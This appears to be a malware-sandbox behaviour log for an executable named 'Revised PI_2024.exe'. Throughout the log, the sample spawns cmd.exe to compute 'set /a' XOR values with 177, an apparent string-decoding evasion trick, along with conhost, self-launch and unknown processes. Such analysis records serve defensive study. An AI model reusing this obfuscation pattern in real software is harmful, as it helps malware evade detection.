            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "193^177"
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Users\user\Desktop\Revised PI_2024.exe "C:\Users\user\Desktop\Revised PI_2024.exe"
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "227^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "253^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "130^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "131^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "242^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "208^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "227^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "247^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "240^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "153^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "220^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "133^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "201^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "201^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "130^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "130^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "133^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "133^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "208^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "133^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "208^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "240^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
